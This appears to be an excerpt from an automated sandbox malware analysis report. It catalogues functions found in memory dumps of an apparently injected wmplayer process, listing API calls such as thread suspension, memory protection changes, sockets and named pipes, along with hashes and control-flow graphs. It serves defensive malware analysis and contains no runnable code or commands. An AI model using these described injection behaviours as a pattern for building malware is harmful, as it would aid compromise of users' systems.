                                                                                                                • Snapshot File: hcaresult_21_3_7df424a01000_wmplayer.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Close$CreateFunctionHandleInformationOpenProcessProtectQueryResumeTableThreadValueVirtualVolumecallocfree
                                                                                                                • String ID: -
                                                                                                                • API String ID: 167522227-2547889144
                                                                                                                • Opcode ID: 105c85825427e7c8ed203293b96c467a96f9bba36c05be2648f83f100e5bc7da
                                                                                                                • Instruction ID: 10a728b2fd8f1690fad31e22be5cdfe9214223120b3eb3771b093450012f5b69
                                                                                                                • Opcode Fuzzy Hash: 105c85825427e7c8ed203293b96c467a96f9bba36c05be2648f83f100e5bc7da
                                                                                                                • Instruction Fuzzy Hash: 0C91A23060CA494BEB55EB64C8957AB73E1FF95301F20553AE54BC31A2DF79E9018782
                                                                                                                Function 000002075879D004 Relevance: 4.6, APIs: 3, Instructions: 110pipeCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000015.00000002.2627175817.0000020758791000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000020758791000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_21_2_20758791000_wmplayer.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: NamedPipe$BindCallbackCompletionConnectCreate
                                                                                                                • String ID:
                                                                                                                • API String ID: 2502124517-0
                                                                                                                • Opcode ID: b1072abd5d2d87ebe3607f0745b4a817757572de37e54cefdeb42629dd895e39
                                                                                                                • Instruction ID: 868c3addc6acf836f9ebaa9af203517f063deb794c7ea5eb8d1c768050fd0e15
                                                                                                                • Opcode Fuzzy Hash: b1072abd5d2d87ebe3607f0745b4a817757572de37e54cefdeb42629dd895e39
                                                                                                                • Instruction Fuzzy Hash: 1531A531608A088FE795EF68D8D87AA7BE5FB98310F600A29D45BC31D1DF74D945CB41
                                                                                                                Function 00000207587A3158 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 81COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 280 207587a3158-207587a3171 281 207587a3173-207587a3176 280->281 282 207587a317b-207587a317e 280->282 283 207587a320e-207587a3216 281->283 284 207587a3180-207587a3185 282->284 285 207587a318a-207587a319f 282->285 284->283 286 207587a31a1-207587a31a5 285->286 287 207587a31ab-207587a31da 285->287 286->287 288 207587a31ea 287->288 289 207587a31dc-207587a31e8 NtAcceptConnectPort 287->289 290 207587a31ef-207587a31f1 288->290 289->290 291 207587a31f3-207587a31fd 290->291 292 207587a320c 290->292 293 207587a31ff-207587a3203 291->293 294 207587a3205 291->294 292->283 295 207587a320a 293->295 294->295 295->292
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000015.00000002.2627175817.0000020758791000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000020758791000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_21_2_20758791000_wmplayer.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 0
                                                                                                                • API String ID: 0-4108050209
                                                                                                                • Opcode ID: c5b43eddf7a139210649571aee53adea5981a484dd6b9365d0c1e8096d80dd49
                                                                                                                • Instruction ID: 2a93747c2ebd6352046044ad5fa9dbcca2411de20390b586843dd69cadf03cee
                                                                                                                • Opcode Fuzzy Hash: c5b43eddf7a139210649571aee53adea5981a484dd6b9365d0c1e8096d80dd49
                                                                                                                • Instruction Fuzzy Hash: BC21D870B08A484FE7909ED8DCCC7797AE0E79D301FB0093EE909D7A91DA25DD848742
                                                                                                                Function 000002075879262C Relevance: 3.3, APIs: 2, Instructions: 293threadinjectionCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 383 2075879262c-20758792666 call 207587d342c 386 20758792738-2075879273b 383->386 387 2075879266c-20758792680 call 207587d3426 Thread32First 383->387 388 20758792741-20758792749 386->388 389 2075879288e-207587928a1 386->389 394 20758792685-2075879268a 387->394 388->389 391 2075879274f-20758792750 388->391 393 20758792752-2075879276b 391->393 401 20758792771-20758792788 SuspendThread 393->401 402 2075879287e-20758792888 393->402 395 20758792690-2075879269a 394->395 396 20758792716-20758792722 call 207587d3420 394->396 395->396 403 2075879269c-207587926a6 395->403 400 20758792727-20758792729 396->400 400->394 404 2075879272f-20758792732 CloseHandle 400->404 405 20758792796-20758792798 401->405 402->389 402->393 403->396 409 207587926a8-207587926ae 403->409 404->386 407 20758792873-2075879287c 405->407 408 2075879279e-207587927a2 405->408 407->402 410 207587927b0-207587927b1 408->410 411 207587927a4-207587927ae 408->411 414 207587926b0-207587926d2 409->414 415 207587926d6-207587926dc 409->415 412 207587927b4-207587927b6 410->412 411->412 412->407 416 207587927bc-207587927d2 412->416 414->404 423 207587926d4 414->423 417 20758792705-20758792712 415->417 418 207587926de-207587926f8 415->418 419 207587927d4-207587927e5 416->419 417->396 418->404 428 207587926fa-20758792702 418->428 421 207587927e7-207587927ea 419->421 422 207587927fe 419->422 425 207587927f7-207587927fc 421->425 426 207587927ec-207587927f5 421->426 427 20758792800-2075879280a 422->427 423->417 425->427 426->427 429 20758792862-2075879286a 427->429 430 2075879280c-2075879280e 427->430 428->417 429->419 431 20758792870-20758792871 429->431 432 20758792814-20758792821 430->432 433 207587928ad-207587928b1 430->433 431->407 434 20758792823-2075879282e 432->434 435 2075879283d 432->435 436 207587928bf-207587928cc 433->436 437 207587928b3-207587928bd 433->437 438 20758792830-2075879283b 434->438 439 207587928a2-207587928ab 434->439 440 2075879283f-20758792842 435->440 441 207587928e9-207587928ed 436->441 442 207587928ce-207587928da 436->442 437->436 437->440 438->434 438->435 439->440 440->429 445 20758792844-2075879285b 440->445 441->435 446 207587928f3-207587928f6 441->446 443 207587928dc-207587928e7 442->443 444 207587928fb-20758792903 442->444 443->441 443->442 444->440 445->429 446->440
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000015.00000002.2627175817.0000020758791000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000020758791000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_21_2_20758791000_wmplayer.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseHandleSuspendThread
                                                                                                                • String ID:
                                                                                                                • API String ID: 1038686644-0
                                                                                                                • Opcode ID: e6fc7b403535ff93a9b75229e2f7f673d76738b256c9c6644f28f980537d77ee
                                                                                                                • Instruction ID: cc4bbcf3accb0389704236559059a144579e3e1fcf4640aaa3e1ee185d63ba54
                                                                                                                • Opcode Fuzzy Hash: e6fc7b403535ff93a9b75229e2f7f673d76738b256c9c6644f28f980537d77ee
                                                                                                                • Instruction Fuzzy Hash: A9913930A1C7044BDBA8EB68DC896B97BD1FB49310FA4095DD85AD7987CA34E842CB81
                                                                                                                Function 00007DF424A12E90 Relevance: 3.0, APIs: 2, Instructions: 40nativeCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000015.00000002.2629687156.00007DF424A11000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF424A11000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_21_2_7df424a11000_wmplayer.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InformationQuerySystem
                                                                                                                • String ID:
                                                                                                                • API String ID: 3562636166-0
                                                                                                                • Opcode ID: d6f0361b43dcc020633b7375cad3ade070dfb937504ad58392e1959d295d159c
                                                                                                                • Instruction ID: 707c4966578bb1d823e66f309f7c0c7866638a0649a88a33a454d68f5d479f5d
                                                                                                                • Opcode Fuzzy Hash: d6f0361b43dcc020633b7375cad3ade070dfb937504ad58392e1959d295d159c
                                                                                                                • Instruction Fuzzy Hash: BF0119346199458FE798EB24EC58AA677E1FFE5301F544029A44BC21A0DE38DA05CB42
                                                                                                                Function 00007DF424A425D4 Relevance: 3.0, APIs: 2, Instructions: 40nativeCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000015.00000002.2629866886.00007DF424A41000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF424A41000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_21_2_7df424a41000_wmplayer.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InformationQuerySystem
                                                                                                                • String ID:
                                                                                                                • API String ID: 3562636166-0
                                                                                                                • Opcode ID: aef705ebc4d608f27ba9e125c208f2bfcfdfb1cc7e38d7701445699f42369a9a
                                                                                                                • Instruction ID: 27f0b1a6b5b00a3917d5b03ba0f8e2f1dde415c27979593296e30f03d602f544
                                                                                                                • Opcode Fuzzy Hash: aef705ebc4d608f27ba9e125c208f2bfcfdfb1cc7e38d7701445699f42369a9a
                                                                                                                • Instruction Fuzzy Hash: E40131346189458FF785EB25DC58B6A77E1FBA4301F544429E44BC21A0DF7CD544CB41
                                                                                                                Function 00007DF424A622CC Relevance: 2.0, APIs: 1, Instructions: 450timeCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000015.00000002.2630049510.00007DF424A61000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF424A61000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_21_2_7df424a61000_wmplayer.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FunctionProtectTableTimerVirtual
                                                                                                                • String ID:
                                                                                                                • API String ID: 2248422592-0
                                                                                                                • Opcode ID: 907297c01f2e853a7e6e6be3efaf92a15819b9f7a160a726e89f0d05781fa5e1
                                                                                                                • Instruction ID: 48156d0f581d12351a2443badcdae47db0bb7140399530ce0a802a970a9e6783
                                                                                                                • Opcode Fuzzy Hash: 907297c01f2e853a7e6e6be3efaf92a15819b9f7a160a726e89f0d05781fa5e1
                                                                                                                • Instruction Fuzzy Hash: 65E17371608A494FEB94EF28DC885AA77E1FF99301F24453ED44BC71A2DF38EA458B41
                                                                                                                Function 000002075879C2D0 Relevance: 1.9, APIs: 1, Instructions: 699memoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000015.00000002.2627175817.0000020758791000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000020758791000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_21_2_20758791000_wmplayer.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AllocVirtual
                                                                                                                • String ID:
                                                                                                                • API String ID: 4275171209-0
                                                                                                                • Opcode ID: 41294f9132f532288ebac11fc5ffb7e2a185503835a2c4f2160672799294d73b
                                                                                                                • Instruction ID: 783c65e882dd1b83098c4e3b413bb4e117b29905c3957d76900c90177264d01e
                                                                                                                • Opcode Fuzzy Hash: 41294f9132f532288ebac11fc5ffb7e2a185503835a2c4f2160672799294d73b
                                                                                                                • Instruction Fuzzy Hash: 1F225A30A1CA544FD76CDB689C8A2F97BD0F799301F640A6ED8DBC2593DA34E506C782
                                                                                                                Function 00000207587A2EC8 Relevance: 1.8, APIs: 1, Instructions: 260nativeCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000015.00000002.2627175817.0000020758791000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000020758791000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_21_2_20758791000_wmplayer.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AcceptConnectPort
                                                                                                                • String ID:
                                                                                                                • API String ID: 1658770261-0
                                                                                                                • Opcode ID: 477f8dc71d31783f34f9248ca41e69be52e3134fae9b2781e769503cf8821e2c
                                                                                                                • Instruction ID: f04ce8200661793e5a63f9d05d43eb125732f17126e844b46bb1e902b2a563a5
                                                                                                                • Opcode Fuzzy Hash: 477f8dc71d31783f34f9248ca41e69be52e3134fae9b2781e769503cf8821e2c
                                                                                                                • Instruction Fuzzy Hash: 3781DA31A1CB498BF7E49F94D8887AA7BD1FB5C300FA04919EC56DB985DF64E8408641
                                                                                                                Function 00000207587A2CAC Relevance: 1.5, APIs: 1, Instructions: 34nativeCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000015.00000002.2627175817.0000020758791000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000020758791000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_21_2_20758791000_wmplayer.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AcceptConnectPort
                                                                                                                • String ID:
                                                                                                                • API String ID: 1658770261-0
                                                                                                                • Opcode ID: 3e504d11f5da52f1af1682200719c15ad2bad24be6b07785b1bf4d7c48f26462
                                                                                                                • Instruction ID: 0227b0268d379be8ba82213c81d24222d2ac3b9c20439802cf3e587e6a3874b2
                                                                                                                • Opcode Fuzzy Hash: 3e504d11f5da52f1af1682200719c15ad2bad24be6b07785b1bf4d7c48f26462
                                                                                                                • Instruction Fuzzy Hash: E1F0D074A1CB848FDBA4EF2CD489B9977E0FB99300F50451DE84CC7245DF3498808B46
                                                                                                                Function 00000207587A2E84 Relevance: 1.5, APIs: 1, Instructions: 29nativeCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000015.00000002.2627175817.0000020758791000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000020758791000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_21_2_20758791000_wmplayer.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AcceptConnectPort
                                                                                                                • String ID:
                                                                                                                • API String ID: 1658770261-0
                                                                                                                • Opcode ID: a3b54702dbe03003ef4b69b8382696d02528a9294142f6c5061081efdfa68d71
                                                                                                                • Instruction ID: 43b0acaf1a9dd27e7bd728d49315a6d8df2537367211b53bf9142c9a99fe3c1f
                                                                                                                • Opcode Fuzzy Hash: a3b54702dbe03003ef4b69b8382696d02528a9294142f6c5061081efdfa68d71
                                                                                                                • Instruction Fuzzy Hash: F3E0927161C6048FDB00DF98CCC99A9B7E0EBE9304F504E2AEC4ACA164D674E6C8C682
                                                                                                                Function 00000207587A2A20 Relevance: 1.5, APIs: 1, Instructions: 18nativeCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000015.00000002.2627175817.0000020758791000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000020758791000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_21_2_20758791000_wmplayer.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AcceptConnectPort
                                                                                                                • String ID:
                                                                                                                • API String ID: 1658770261-0
                                                                                                                • Opcode ID: 62332437ee16da287e3653c526f206484f17471112b3976b2a00ba68a8ac2207
                                                                                                                • Instruction ID: 7c900a97e6079fd3750de9c9f20cc8d593132a2531dc6a742ed9f268dc46ca4f
                                                                                                                • Opcode Fuzzy Hash: 62332437ee16da287e3653c526f206484f17471112b3976b2a00ba68a8ac2207
                                                                                                                • Instruction Fuzzy Hash: ECD01234A287458BD654AB6888406097BE1F7DE314FA48A18EC4497321E639E4818687
                                                                                                                Function 00000207587A2D80 Relevance: 1.5, APIs: 1, Instructions: 18nativeCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000015.00000002.2627175817.0000020758791000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000020758791000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_21_2_20758791000_wmplayer.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AcceptConnectPort
                                                                                                                • String ID:
                                                                                                                • API String ID: 1658770261-0
                                                                                                                • Opcode ID: 89f4a05ad4cf7a5c42d1f7300e09080cac91406142c330baf98efa371945559f
                                                                                                                • Instruction ID: f256ee397aa326f0a1699955305686aa160f28efa185b37fe0ca7f54f37ffb73
                                                                                                                • Opcode Fuzzy Hash: 89f4a05ad4cf7a5c42d1f7300e09080cac91406142c330baf98efa371945559f
                                                                                                                • Instruction Fuzzy Hash: 82D05E24A3CB898BDA90A7688D006053BE1F7DA304FA14A18A848C3205E62DE4808287
                                                                                                                Function 00000207587A2DAC Relevance: 1.5, APIs: 1, Instructions: 18nativeCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000015.00000002.2627175817.0000020758791000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000020758791000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_21_2_20758791000_wmplayer.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AcceptConnectPort
                                                                                                                • String ID:
                                                                                                                • API String ID: 1658770261-0
                                                                                                                • Opcode ID: f3aebb9c130a7595b6eefcdad82ea6d301f140e42f53323116d57528b48ef3ee
                                                                                                                • Instruction ID: 38bcbd949f546cf14b472cda1528af5da3fa08d004d778623a624a62ed32a8ea
                                                                                                                • Opcode Fuzzy Hash: f3aebb9c130a7595b6eefcdad82ea6d301f140e42f53323116d57528b48ef3ee
                                                                                                                • Instruction Fuzzy Hash: B8D01234A2D7498BDB50AB6899406097FE1F7DE314FA44A1CEC4497311E679E48086C6
                                                                                                                Function 00000207587A2DDC Relevance: 1.5, APIs: 1, Instructions: 13nativeCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • NtAcceptConnectPort.NTDLL(?,?,?,?,?,?,?,?,?,0000020758795367), ref: 00000207587A2DEC
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000015.00000002.2627175817.0000020758791000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000020758791000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_21_2_20758791000_wmplayer.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AcceptConnectPort
                                                                                                                • String ID:
                                                                                                                • API String ID: 1658770261-0
                                                                                                                • Opcode ID: 09515c4071d5cd1d26304305e5d382a5795874c756b6f30558b0c1d7e16e0e91
                                                                                                                • Instruction ID: 4811509b3ca80867bb15a6e5176fa57a763c3b5368f1bdec0b5eaf7eb049e000
                                                                                                                • Opcode Fuzzy Hash: 09515c4071d5cd1d26304305e5d382a5795874c756b6f30558b0c1d7e16e0e91
                                                                                                                • Instruction Fuzzy Hash: 57C08C10A2C90B4BE99462AE4D847542480A34E344FE00800A804C658AFC4CE8C0539A
                                                                                                                Function 00000207587A290C Relevance: 1.5, APIs: 1, Instructions: 13nativeCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000015.00000002.2627175817.0000020758791000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000020758791000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_21_2_20758791000_wmplayer.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AcceptConnectPort
                                                                                                                • String ID:
                                                                                                                • API String ID: 1658770261-0
                                                                                                                • Opcode ID: ea9358fbe28cd15c97578867be2afda9ae4f1a6df4f19420141c692e89a91aba
                                                                                                                • Instruction ID: bffeaeee4367b308b1625de999f79be9ef938c55700e02ce68cc7e6a3ff58730
                                                                                                                • Opcode Fuzzy Hash: ea9358fbe28cd15c97578867be2afda9ae4f1a6df4f19420141c692e89a91aba
                                                                                                                • Instruction Fuzzy Hash: 59C08C04E2C90A4BFA8667EA8C843943890A36E700FD104009804F6980FC0DE4C04392
                                                                                                                Function 00007DF424A01438 Relevance: 6.1, APIs: 4, Instructions: 134registryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000015.00000003.2400461839.00007DF424A01000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF424A01000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_21_3_7df424a01000_wmplayer.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseInformationOpenQueryValueVolume
                                                                                                                • String ID:
                                                                                                                • API String ID: 4069062851-0
                                                                                                                • Opcode ID: 3ebb744f0aebbecadcf06631c3d65907a1788fb7df7ced3004579ef494ef68f9
                                                                                                                • Instruction ID: c9050b29cae0cec134ca54777da21070525e8b1686497878dde4f148956a9553
                                                                                                                • Opcode Fuzzy Hash: 3ebb744f0aebbecadcf06631c3d65907a1788fb7df7ced3004579ef494ef68f9
                                                                                                                • Instruction Fuzzy Hash: F0413F3151CA488BE755EF24C899BDBB3F1FB95301F105A2EE08BC61A1DF79E6048B42
                                                                                                                Function 00000207587A84C0 Relevance: 6.1, APIs: 4, Instructions: 130networkCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000015.00000002.2627175817.0000020758791000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000020758791000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_21_2_20758791000_wmplayer.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: socket$ErrorModegetsockopt
                                                                                                                • String ID:
                                                                                                                • API String ID: 552242919-0
                                                                                                                • Opcode ID: f4e6771871a383ecd65cf7c786fccd009df30cb3b3764fe840cb75ff13171734
                                                                                                                • Instruction ID: 86fdd83d841727ce620044bd8a8d53bc83f3d96be1ac70cb12c1429dccbb6212
                                                                                                                • Opcode Fuzzy Hash: f4e6771871a383ecd65cf7c786fccd009df30cb3b3764fe840cb75ff13171734
                                                                                                                • Instruction Fuzzy Hash: B241D974618B488FE798EF28DC585AA77E1FB99300F504A2DE44BD36A1DF38D405CB41
                                                                                                                Function 00007DF424A18C38 Relevance: 6.1, APIs: 4, Instructions: 130networkCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000015.00000002.2629687156.00007DF424A11000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF424A11000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_21_2_7df424a11000_wmplayer.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: socket$ErrorModeclosesocket
                                                                                                                • String ID:
                                                                                                                • API String ID: 2183620661-0
                                                                                                                • Opcode ID: 86a7dbef4beb537d1f960ef4159f5a72687c895cdfeef9c93758c5432ac85e68
                                                                                                                • Instruction ID: ecea8cadb8bf9e2341c12bfdde15b98f4a008c0d622a225e3edff47141cfa661
                                                                                                                • Opcode Fuzzy Hash: 86a7dbef4beb537d1f960ef4159f5a72687c895cdfeef9c93758c5432ac85e68
                                                                                                                • Instruction Fuzzy Hash: BE41483061C7488FE758EF28E85859A77E1FB99301F508639E49BC32A1DF789645CB41
                                                                                                                Function 000002075879E2A8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 74memoryCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000015.00000002.2627175817.0000020758791000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000020758791000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_21_2_20758791000_wmplayer.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ProtectVirtual
                                                                                                                • String ID: rE\
                                                                                                                • API String ID: 544645111-988334199
                                                                                                                • Opcode ID: 75d6d8eb26df1a839d51af674b3d6b425c3a8640e6788e6840d12e792dd5345f
                                                                                                                • Instruction ID: c2963762efc6fe1d9f2c496a1306acf4f839409e401dc47fd79da7972da23b19
                                                                                                                • Opcode Fuzzy Hash: 75d6d8eb26df1a839d51af674b3d6b425c3a8640e6788e6840d12e792dd5345f
                                                                                                                • Instruction Fuzzy Hash: 72118231718A090BEB85F7A8AC95BE976EAF7DC300F901929994FC3286DE28DD454781
                                                                                                                Function 000002075879BC64 Relevance: 4.6, APIs: 3, Instructions: 110fileCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000015.00000002.2627175817.0000020758791000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000020758791000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_21_2_20758791000_wmplayer.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$CloseHandleMappingOpenView
                                                                                                                • String ID:
                                                                                                                • API String ID: 2553196624-0
                                                                                                                • Opcode ID: e5e44baeb6ac7a5ef2abf0622d7dcda60392d94986a7d3768f6014d184717f4c
                                                                                                                • Instruction ID: 5b91e267377b3279295a262e133fbf3ed086332039a737eac9618f4a2f1317cc
                                                                                                                • Opcode Fuzzy Hash: e5e44baeb6ac7a5ef2abf0622d7dcda60392d94986a7d3768f6014d184717f4c
                                                                                                                • Instruction Fuzzy Hash: B231A63161CA4C4FEB95FF64D8896EAB7D4FB58300F604A29A84BC7597EE30E5058781
                                                                                                                Function 000002075879BA4C Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 147COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000015.00000002.2627175817.0000020758791000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000020758791000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_21_2_20758791000_wmplayer.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateWindow
                                                                                                                • String ID: P
                                                                                                                • API String ID: 716092398-3110715001
                                                                                                                • Opcode ID: cfa3f0b6778a70b443997505d324e50d054ac30842702c4c9102a20ff55eb27d
                                                                                                                • Instruction ID: ea87ae4f9afd3e37ec2f1b18ada073552247aa75fc777d9dbfb255201e912b63
                                                                                                                • Opcode Fuzzy Hash: cfa3f0b6778a70b443997505d324e50d054ac30842702c4c9102a20ff55eb27d
                                                                                                                • Instruction Fuzzy Hash: 0651647051CB448FD7A5EF24D88A79ABBE4FB99310F104A2EE48EC2191DF349445CB83
                                                                                                                Function 00007DF424A447B8 Relevance: 3.3, APIs: 2, Instructions: 339windowCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 297 7df424a447b8-7df424a447f0 call 7df424a41478 300 7df424a447f6-7df424a4480e call 7df424a41538 297->300 301 7df424a44b0d-7df424a44b32 call 7df424a455b0 297->301 300->301 306 7df424a44814-7df424a44845 call 7df424a41708 call 7df424a41740 call 7df424a41818 300->306 306->301 314 7df424a4484b-7df424a4485d 306->314 314->301 316 7df424a44863-7df424a44880 314->316 318 7df424a44886-7df424a448f6 call 7df424a4db48 * 3 316->318 319 7df424a44958-7df424a44a0d call 7df424a4db48 call 7df424a428d4 call 7df424a4db72 call 7df424a4db6c call 7df424a4db66 SendMessageA 316->319 337 7df424a44953-7df424a44956 318->337 363 7df424a44a12-7df424a44a18 319->363 337->319 340 7df424a448f8-7df424a448fb 337->340 341 7df424a44909-7df424a44921 calloc 340->341 342 7df424a448fd-7df424a44901 340->342 345 7df424a44927-7df424a44945 call 7df424a455d0 341->345 346 7df424a44a7e 341->346 342->341 344 7df424a44903-7df424a44907 342->344 344->341 348 7df424a44950-7df424a44951 344->348 354 7df424a4494b-7df424a4494c 345->354 355 7df424a44a5c-7df424a44a60 345->355 352 7df424a44a87-7df424a44a8a 346->352 348->337 356 7df424a44af5-7df424a44af6 352->356 357 7df424a44a8c-7df424a44a8f 352->357 358 7df424a4494e 354->358 359 7df424a44a6b-7df424a44a6f 355->359 360 7df424a44a62-7df424a44a66 355->360 365 7df424a44afe-7df424a44b08 call 7df424a42730 356->365 361 7df424a44ade 357->361 362 7df424a44a91-7df424a44ab4 call 7df424a4db48 357->362 358->348 359->358 367 7df424a44a75-7df424a44a79 359->367 360->358 368 7df424a44ae0-7df424a44af3 361->368 376 7df424a44ab6-7df424a44abc 362->376 377 7df424a44abe-7df424a44ad6 call 7df424a4db48 362->377 363->365 366 7df424a44a1e-7df424a44a24 363->366 365->301 366->365 371 7df424a44a2a-7df424a44a3e 366->371 367->358 368->352 368->356 371->365 378 7df424a44a44-7df424a44a57 call 7df424a455d0 371->378 376->361 377->361 378->368
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000015.00000002.2629866886.00007DF424A41000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF424A41000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_21_2_7df424a41000_wmplayer.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FunctionMessageProtectSendTableVirtualcalloc
